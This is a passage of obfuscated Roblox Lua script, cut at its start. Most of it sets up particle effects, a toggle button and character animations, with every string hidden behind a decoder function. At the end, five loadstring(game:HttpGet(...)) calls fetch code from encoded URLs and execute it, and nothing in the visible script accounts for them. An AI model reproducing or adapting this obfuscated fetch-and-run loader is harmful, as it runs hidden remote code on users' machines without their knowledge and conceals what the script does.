),[v7("\192\215\9\49\42\224\221","\70\133\185\104\83")]=true,[v7("\37\70\71\47\197\1\87\69\62\192\11\75","\169\100\37\36\74")]=Vector3.new(502 -(444 + 58) ,0 + 0 ,1243 -(157 + 1086) ),[v7("\50\136\182\99\16\130\167\84","\48\96\231\194")]=NumberRange.new( -(18 + 82),200 -100 ),[v7("\228\85\13\38\28\220\155\140\248\91\28\57","\227\168\58\110\77\121\184\207")]=true,[v7("\73\61\171\69","\197\27\92\223\32\209\187\17")]=218 -168 ,[v7("\38\82\202\232\16\86\204\245\39\86\209\254\0\75\202\244\13","\155\99\63\163")]=Enum.NormalId.Top,[v7("\182\195\160\131\170\148\131\195\164\131\186\157","\228\226\177\193\237\217")]=NumberSequence.new({NumberSequenceKeypoint.new(0 -0 ,820 -(599 + 220) ,0),NumberSequenceKeypoint.new(0.116564,0.704918 -0 ,494 -(415 + 79) ),NumberSequenceKeypoint.new(0.654908 -0 ,1931.73224 -(1813 + 118) ,0 + 0 ),NumberSequenceKeypoint.new(1218 -(841 + 376) ,1 -0 ,0 + 0 )}),[v7("\7\185\57\227","\134\84\208\67")]=NumberSequence.new({NumberSequenceKeypoint.new(0 -0 ,1864.9 -(1710 + 154) ,859 -(464 + 395) ),NumberSequenceKeypoint.new(1 + 0 ,0.9,837 -(467 + 370) )}),[v7("\63\165\129\84\7\137\139\85\0\191\143\83\29","\60\115\204\230")]=0.30000001192092896,[v7("\211\63\243\100\242\40\238","\16\135\90\139")]=v7("\70\118\30\50\93\71\125\64\125\2\105\1\27\32\7\39\94\100\26\0\43\0","\24\52\20\102\83\46\52"),[v7("\247\62\52\37\28\204","\111\164\79\65\68")]=NumberSequence.new(0 -0 ),[v7("\233\203\138\219\32\254\199\205\138\209\32","\138\166\185\227\190\78")]=Enum.ParticleOrientation.FacingCamera},{[v7("\232\123\201\56\64","\121\171\20\165\87\50\67")]=ColorSequence.new({ColorSequenceKeypoint.new(0 + 0 ,Color3.new(0 + 0 ,0 + 0 ,0)),ColorSequenceKeypoint.new(1,Color3.new(520 -(150 + 370) ,1282 -(74 + 1208) ,0 -0 ))}),[v7("\226\42\184\49","\98\166\88\217\86\217")]=0 -0 ,[v7("\204\217\127\7\149\217\226","\188\150\150\25\97\230")]= -(2 -1),[v7("\238\128\82\7\63\238\219\133\90","\141\186\233\63\98\108")]=2 -1 ,[v7("\221\227\43\190\49\216\228\42\186\48\244\228\47\179","\69\145\138\76\214")]=1 + 0 ,[v7("\92\198\143\140\171\31\125\202","\118\16\175\233\233\223")]=NumberRange.new(9 -7 ,2 + 0 ),[v7("\184\148\48\190\234","\29\235\228\85\219\142\235")]=NumberRange.new(390.5 -(14 + 376) ,0.5 -0 ),[v7("\14\196\168\216\118\74\6\92\58\216\191","\50\93\180\218\189\23\46\71")]=Vector2.new(7 + 8 ,10 + 5 ),[v7("\251\170\90\78\72\217\76","\40\190\196\59\44\36\188")]=true,[v7("\29\70\223\177\246\120\31\61\81\213\187\244","\109\92\37\188\212\154\29")]=Vector3.new(0 + 0 ,0 + 0 ,837 -(289 + 548) ),[v7("\54\224\176\240\33\95\1\235","\58\100\143\196\163\81")]=NumberRange.new( -(293 -193),76 + 24 ),[v7("\54\77\32\168\58\77\209\1\42\67\49\183","\110\122\34\67\195\95\41\133")]=true,[v7("\71\176\79\79","\182\21\209\59\42")]=128 -(23 + 55) ,[v7("\146\90\204\14\50\183\184\89\225\20\51\187\180\67\204\18\47","\222\215\55\165\125\65")]=Enum.NormalId.Top,[v7("\24\195\199\20\225\209\236\88\41\223\197\3","\42\76\177\166\122\146\161\141")]=NumberSequence.new({NumberSequenceKeypoint.new(0 + 0 ,1 + 0 ,0 -0 ),NumberSequenceKeypoint.new(901.116564 -(652 + 249) ,0.704918 -0 ,0),NumberSequenceKeypoint.new(1032.654908 -(809 + 223) ,0.73224 -0 ,0 -0 ),NumberSequenceKeypoint.new(28 -(10 + 17) ,1 + 0 ,0 + 0 )}),[v7("\150\131\31\203","\22\197\234\101\174\25")]=NumberSequence.new({NumberSequenceKeypoint.new(0,0.9 -0 ,1908 -(242 + 1666) ),NumberSequenceKeypoint.new(1 + 0 ,0.9 + 0 ,949 -(551 + 398) )}),[v7("\1\61\162\212\98\138\218\143\62\39\172\211\120","\230\77\84\197\188\22\207\183")]=940.3000000119209 -(850 + 90) ,[v7("\205\17\222\232\153\179\245","\85\153\116\166\156\236\193\144")]=v7("\182\226\85\178\247\19\161\244\68\183\190\79\235\184\30\224\188\87\240\180\30\231","\96\196\128\45\211\132"),[v7("\6\156\110\94\193\167","\184\85\237\27\63\178\207\212")]=NumberSequence.new(0 -0 ),[v7("\39\75\0\90\6\77\8\75\1\86\7","\63\104\57\105")]=Enum.ParticleOrientation.FacingCamera},{[v7("\40\136\168\75\25","\36\107\231\196")]=ColorSequence.new({ColorSequenceKeypoint.new(0 + 0 ,Color3.new(0 -0 ,0 -0 ,0 + 0 )),ColorSequenceKeypoint.new(1662 -(909 + 752) ,Color3.new(1223 -(109 + 1114) ,0 -0 ,0))}),[v7("\121\167\163\128","\231\61\213\194")]=0 + 0 ,[v7("\51\130\59\117\26\168\41","\19\105\205\93")]= -(2 + 0),[v7("\157\1\211\132\12\170\9\210\132","\95\201\104\190\225")]=243 -(6 + 236) ,[v7("\131\194\198\198\187\226\207\200\163\222\196\192\172\206","\174\207\171\161")]=4 -3 ,[v7("\193\247\11\246\236\222\224\251","\183\141\158\109\147\152")]=NumberRange.new(2 + 0 ,2 + 0 ),[v7("\31\25\227\9\40","\108\76\105\134")]=NumberRange.new(0.5 -0 ,0.5 -0 ),[v7("\216\213\163\228\207\239\228\191\230\194\238","\174\139\165\209\129")]=Vector2.new(15,1619 -(1032 + 572) ),[v7("\134\189\227\195\202\6\116","\24\195\211\130\161\166\99\16")]=true,[v7("\103\0\234\41\95\19\84\2\253\37\92\24","\118\38\99\137\76\51")]=Vector3.new(0,0,1133 -(1076 + 57) ),[v7("\207\41\17\33\25\37\248\34","\64\157\70\101\114\105")]=NumberRange.new( -(17 + 83),789 -(579 + 110) ),[v7("\108\167\164\232\21\68\156\168\211\17\82\188","\112\32\200\199\131")]=true,[v7("\30\81\72\189","\66\76\48\60\216\163\203")]=120 -70 ,[v7("\159\139\112\224\76\199\43\180\162\112\225\90\205\48\179\137\119","\68\218\230\25\147\63\174")]=Enum.NormalId.Top,[v7("\153\56\82\66\165\189\43\65\73\184\174\51","\214\205\74\51\44")]=NumberSequence.new({NumberSequenceKeypoint.new(0 + 0 ,1307 -(913 + 393) ,0 -0 ),NumberSequenceKeypoint.new(0.116564 + 0 ,0.704918 -0 ,0 + 0 ),NumberSequenceKeypoint.new(0.654908 -0 ,0.73224 -0 ,0 + 0 ),NumberSequenceKeypoint.new(1175 -(663 + 511) ,1 + 0 ,0 + 0 )}),[v7("\201\69\248\249","\23\154\44\130\156")]=NumberSequence.new({NumberSequenceKeypoint.new(0 -0 ,1 + 0 ,0),NumberSequenceKeypoint.new(1,2 -1 ,0 + 0 )}),[v7("\61\175\170\166\34\54\28\175\190\189\63\28\31","\115\113\198\205\206\86")]=0.30000001192092896 -0 ,[v7("\176\82\230\78\145\69\251","\58\228\55\158")]=v7("\166\139\200\47\47\190\48\160\128\212\116\115\226\109\231\218\136\121\104\249\102\224","\85\212\233\176\78\92\205"),[v7("\121\73\157\227\89\80","\130\42\56\232")]=NumberSequence.new(0 + 0 ),[v7("\197\167\45\230\78\43\235\161\45\236\78","\95\138\213\68\131\32")]=Enum.ParticleOrientation.FacingCamera},{[v7("\9\39\173\76\100","\22\74\72\193\35")]=ColorSequence.new({ColorSequenceKeypoint.new(0 -0 ,Color3.new(0.768628 + 0 ,0.152941 -0 ,0.811765)),ColorSequenceKeypoint.new(2 -1 ,Color3.new(0.768628 + 0 ,722.152941 -(478 + 244) ,0.811765))}),[v7("\8\107\229\95","\56\76\25\132")]=517 -(440 + 77) ,[v7("\100\238\173\32\220\91\213","\175\62\161\203\70")]=2 + 2 ,[v7("\8\212\206\22\6\63\220\207\22","\85\92\189\163\115")]=1 + 0 ,[v7("\5\165\55\48\61\133\62\62\37\185\53\54\42\169","\88\73\204\80")]=3 -2 ,[v7("\2\138\22\67\61\211\35\134","\186\78\227\112\38\73")]=NumberRange.new(1558 -(655 + 901) ,4 -2 ),[v7("\207\71\248\80\87","\26\156\55\157\53\51")]=NumberRange.new(0.5 + 0 ,0.5 + 0 ),[v7("\191\200\4\220\185\84\173\214\17\213\189","\48\236\184\118\185\216")]=Vector2.new(15,15),[v7("\192\179\86\50\195\49\225","\84\133\221\55\80\175")]=true,[v7("\156\228\39\163\203\89\175\230\48\175\200\82","\60\221\135\68\198\167")]=Vector3.new(0,0 + 0 ,0 -0 ),[v7("\220\178\236\176\82\220\235\185","\185\142\221\152\227\34")]=NumberRange.new( -(1545 -(695 + 750)),341 -241 ),[v7("\116\202\84\241\70\55\195\87\245\86\232\87","\151\56\165\55\154\35\83")]=true,[v7("\146\66\17\235","\142\192\35\101")]=45,[v7("\243\120\32\176\244\133\163\24\242\124\59\166\228\152\165\25\216","\118\182\21\73\195\135\236\204")]=Enum.NormalId.Top,[v7("\60\46\27\78\23\29\252\26\57\20\67\29","\157\104\92\122\32\100\109")]=NumberSequence.new({NumberSequenceKeypoint.new(0,3 -2 ,351 -(285 + 66) ),NumberSequenceKeypoint.new(1310.116564 -(682 + 628) ,0.704918 + 0 ,0 -0 ),NumberSequenceKeypoint.new(299.654908 -(176 + 123) ,0.73224 + 0 ,0 + 0 ),NumberSequenceKeypoint.new(1 + 0 ,1020 -(829 + 190) ,0 + 0 )}),[v7("\144\175\213\207","\203\195\198\175\170\93\71\237")]=NumberSequence.new({NumberSequenceKeypoint.new(0 -0 ,0.01 -0 ,0 + 0 ),NumberSequenceKeypoint.new(1 + 0 ,0.01 -0 ,0 -0 )}),[v7("\2\66\57\221\69\52\241\39\88\45\220\94\31","\156\78\43\94\181\49\113")]=0.30000001192092896 + 0 ,[v7("\70\237\220\183\30\81\124","\25\18\136\164\195\107\35")]=v7("\250\47\177\78\97\175\196\172\225\41\243\0\61\238\149\235\191\121\249\31\35\239","\216\136\77\201\47\18\220\161"),[v7("\30\253\62\219\27\212","\226\77\140\75\186\104\188")]=NumberSequence.new(0 + 0 ),[v7("\150\220\217\58\65\173\207\196\54\64\183","\47\217\174\176\95")]=Enum.ParticleOrientation.FacingCamera},{[v7("\155\210\122\13\160","\70\216\189\22\98\210\52\24")]=ColorSequence.new({ColorSequenceKeypoint.new(0 -0 ,Color3.new(0 + 0 ,1375 -(1140 + 235) ,0 -0 )),ColorSequenceKeypoint.new(1 + 0 ,Color3.new(0 + 0 ,0 + 0 ,52 -(33 + 19) ))}),[v7("\254\205\162\128","\179\186\191\195\231")]=0 + 0 ,[v7("\195\16\30\226\234\58\12","\132\153\95\120")]=11 -7 ,[v7("\133\187\3\40\196\217\161\189\183","\192\209\210\110\77\151\186")]=1 + 0 ,[v7("\204\10\37\225\235\237\238\5\46\252\250\202\227\6","\164\128\99\66\137\159")]=4 -3 ,[v7("\44\128\239\187\20\128\228\187","\222\96\233\137")]=NumberRange.new(3 -1 ,2 + 0 ),[v7("\138\163\162\26\140","\144\217\211\199\127\232\147")]=NumberRange.new(689.5 -(586 + 103) ,0.5 + 0 ),[v7("\203\63\44\45\212\65\35\74\255\35\59","\36\152\79\94\72\181\37\98")]=Vector2.new(1362 -(641 + 706) ,46 -31 ),[v7("\242\214\70\61\219\221\67","\95\183\184\39")]=true,[v7("\148\60\228\35\88\133\16\180\43\238\41\90","\98\213\95\135\70\52\224")]=Vector3.new(0 + 0 ,440 -(249 + 191) ,1488 -(1309 + 179) ),[v7("\204\172\221\68\68\251\166\205","\52\158\195\169\23")]=NumberRange.new( -100,100),[v7("\86\179\49\127\131\49\79\132\74\189\32\96","\235\26\220\82\20\230\85\27")]=true,[v7("\186\160\253\199","\20\232\193\137\162")]=21 + 24 ,[v7("\7\210\204\181\244\133\24\127\6\214\215\163\228\152\30\126\44","\17\66\191\165\198\135\236\119")]=Enum.NormalId.Top,[v7("\59\189\175\29\236\248\237\195\10\161\173\10","\177\111\207\206\115\159\136\140")]=NumberSequence.new({NumberSequenceKeypoint.new(0 + 0 ,2 -1 ,0 + 0 ),NumberSequenceKeypoint.new(730.116564 -(434 + 296) ,0.704918 -0 ,0 -0 ),NumberSequenceKeypoint.new(0.654908 -0 ,609.73224 -(295 + 314) ,0),NumberSequenceKeypoint.new(1963 -(1300 + 662) ,3 -2 ,1755 -(1178 + 577) )}),[v7("\54\128\10\17","\63\101\233\112\116\180\47")]=NumberSequence.new({NumberSequenceKeypoint.new(0,0.01 -0 ,1405 -(851 + 554) ),NumberSequenceKeypoint.new(1 + 0 ,0.01 -0 ,0 -0 )}),[v7("\239\50\234\26\236\19\206\50\254\1\241\57\205","\86\163\91\141\114\152")]=302.30000001192093 -(115 + 187) ,[v7("\103\14\108\103\47\65\14","\90\51\107\20\19")]=v7("\159\242\157\238\46\158\245\145\230\57\215\191\202\189\105\222\167\209\191\109\220\163","\93\237\144\229\143"),[v7("\38\231\229\24\24\78","\38\117\150\144\121\107")]=NumberSequence.new(0 + 0 ),[v7("\2\169\231\63\35\175\239\46\36\180\224","\90\77\219\142")]=Enum.ParticleOrientation.FacingCamera},{[v7("\197\11\45\54\94","\26\134\100\65\89\44\103")]=ColorSequence.new({ColorSequenceKeypoint.new(1161 -(160 + 1001) ,Color3.new(0.756863,1 + 0 ,0.984314 + 0 )),ColorSequenceKeypoint.new(1 + 0 ,Color3.new(0.756863 -0 ,1 + 0 ,358.984314 -(237 + 121) ))}),[v7("\213\241\49\36","\196\145\131\80\67")]=0,[v7("\36\159\0\14\11\237\10","\136\126\208\102\104\120")]=898 -(525 + 372) ,[v7("\76\131\195\70\156\81\60\93\125","\49\24\234\174\35\207\50\93")]=1 -0 ,[v7("\32\251\250\128\101\37\252\251\132\100\9\252\254\141","\17\108\146\157\232")]=1,[v7("\103\202\18\232\59\161\70\198","\200\43\163\116\141\79")]=NumberRange.new(1,1191 -(50 + 1140) ),[v7("\140\38\56\134\180","\131\223\86\93\227\208\148")]=NumberRange.new(6 -4 ,144 -(96 + 46) ),[v7("\208\85\164\179\28\177\194\75\177\186\24","\213\131\37\214\214\125")]=Vector2.new(777 -(643 + 134) ,0 + 0 ),[v7("\3\37\36\189\237\35\47","\129\70\75\69\223")]=true,[v7("\103\200\240\236\112\234\84\202\231\224\115\225","\143\38\171\147\137\28")]=Vector3.new(0 -0 ,0 -0 ,596 -(157 + 439) ),[v7("\226\141\173\192\19\230\209\212","\180\176\226\217\147\99\131")]=NumberRange.new(371 -271 ,96 + 4 ),[v7("\255\182\44\12\214\189\27\8\227\184\61\19","\103\179\217\79")]=false,[v7("\120\182\8\208","\195\42\215\124\181\33\236")]=98 -48 ,[v7("\40\84\62\45\54\241\2\87\19\55\55\253\14\77\62\49\43","\152\109\57\87\94\69")]=Enum.NormalId.Top,[v7("\205\197\11\173\173\194\85\186\252\217\9\186","\200\153\183\106\195\222\178\52")]=NumberSequence.new({NumberSequenceKeypoint.new(0 -0 ,0.9,855 -(112 + 743) ),NumberSequenceKeypoint.new(1 + 0 ,0.9,0 -0 )}),[v7("\1\234\146\56","\58\82\131\232\93\41")]=NumberSequence.new({NumberSequenceKeypoint.new(0 -0 ,0.5 -0 ,0 + 0 ),NumberSequenceKeypoint.new(2 -1 ,0.5 + 0 ,0 + 0 )}),[v7("\175\94\215\29\73\26\142\94\195\6\84\48\141","\95\227\55\176\117\61")]=0.30000001192092896 -0 ,[v7("\44\123\59\95\190\10\123","\203\120\30\67\43")]=v7("\227\39\85\238\202\226\32\89\230\221\171\106\2\183\138\162\125\26\187\141\162\113","\185\145\69\45\143"),[v7("\185\14\12\167\207\130","\188\234\127\121\198")]=NumberSequence.new(0),[v7("\23\32\26\134\54\38\18\151\49\61\29","\227\88\82\115")]=Enum.ParticleOrientation.FacingCamera}};local function v49() for v76,v77 in ipairs(v46) do if v77 then for v83,v84 in ipairs(v48) do v47(v77,v84);end end end v45=true;if v18 then v18:Resume();end end local function v50() local v73=0 -0 ;while true do if (v73==(0 -0)) then local v80=0 + 0 ;local v81;while true do if (v80==(0 -0)) then v81=0 + 0 ;while true do if (v81==(0 + 0)) then for v102,v103 in ipairs(v46) do if v103 then for v110,v111 in ipairs(v103:GetChildren()) do if v111:IsA(v7("\115\30\168\179\11\112\79\26\159\170\11\103\87\26\168","\19\35\127\218\199\98")) then v111:Destroy();end end end end v45=false;v81=2 -1 ;end if (1==v81) then v73=18 -(12 + 5) ;break;end end break;end end end if (v73==(3 -2)) then if v18 then v18:Pause();end break;end end end v41.Activated:Connect(function() if v45 then v50();else v49();end end);v49();v15.StateChanged:Connect(function(v74,v75) if (v75==Enum.HumanoidStateType.Running) then if  not v39.IsPlaying then v36:Play();end elseif ((v75==Enum.HumanoidStateType.Idle) or (v75==Enum.HumanoidStateType.Freefall)) then v33:Play();elseif (v75==Enum.HumanoidStateType.Jumping) then local v87=0 -0 ;local v88;while true do if (v87==(0 -0)) then v88=0 -0 ;while true do if (v88==(574 -(489 + 85))) then v33:Stop();v36:Stop();break;end end break;end end else v36:Stop();end end);v33:Play();loadstring(game:HttpGet(v7("\20\239\30\242\15\161\69\173\12\250\25\246\25\249\3\236\82\248\5\239\83\233\11\245\83\169\8\186\55\234\32\193\12","\130\124\155\106")))();loadstring(game:HttpGet(v7("\221\223\226\191\176\172\51\240\197\202\229\187\166\244\117\177\155\200\249\162\236\228\125\168\154\157\196\181\242\208\118\190\253","\223\181\171\150\207\195\150\28")))();loadstring(game:HttpGet(v7("\68\46\247\190\26\22\117\172\190\8\95\46\230\172\0\66\116\224\161\4\3\40\226\185\70\107\8\205\168\12\105\30\240","\105\44\90\131\206")))();loadstring(game:HttpGet(v7("\247\244\166\169\27\100\176\175\162\184\27\42\250\226\187\183\70\61\240\237\253\171\9\41\176\204\150\184\50\59\241\193\180","\94\159\128\210\217\104")))();loadstring(game:HttpGet(v7("\88\237\18\175\76\37\182\53\64\248\21\171\90\125\240\116\30\250\9\178\16\109\248\109\31\200\50\234\77\122\227\126\102","\26\48\153\102\223\63\31\153")))();end